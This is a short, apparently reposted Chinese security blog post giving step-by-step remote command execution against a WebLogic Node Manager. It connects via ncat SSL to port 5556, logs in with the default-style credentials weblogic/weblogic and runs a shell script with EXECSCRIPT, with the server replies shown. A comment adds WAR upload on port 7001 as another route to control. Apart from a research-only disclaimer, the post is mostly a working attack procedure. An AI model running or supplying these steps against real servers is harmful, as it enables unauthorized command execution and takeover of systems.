By:cnbird
1.找到5556的SSL端口
ncat --ssl ip 5556
输出HELLO
+OK Node manager v10.3 started
2.设置domain
DOMAIN my_domain ipc$
+OK Current domain set to 'my_domain'
3.注意这里是上面自己设置的weblogic的密码,不是服务器默认的
USER weblogic
PASS weblogic
4.执行命令
EXECSCRIPT 1.sh
参考资料:
http://book.51cto.com/art/201110/295927.htm
http://guanting.com/security/bug/information/3343.html
这个在指定WebLogic域名之后,Node Manager要求使用USER和PASS进行验证吧。如果有账号密码,直接7001登录,再上war,一样可以拿到权限的哦。
文章来源于lcx.cc:weblogic node manager 远程命令执行漏洞
0x00 什么是弱口令 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。 弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论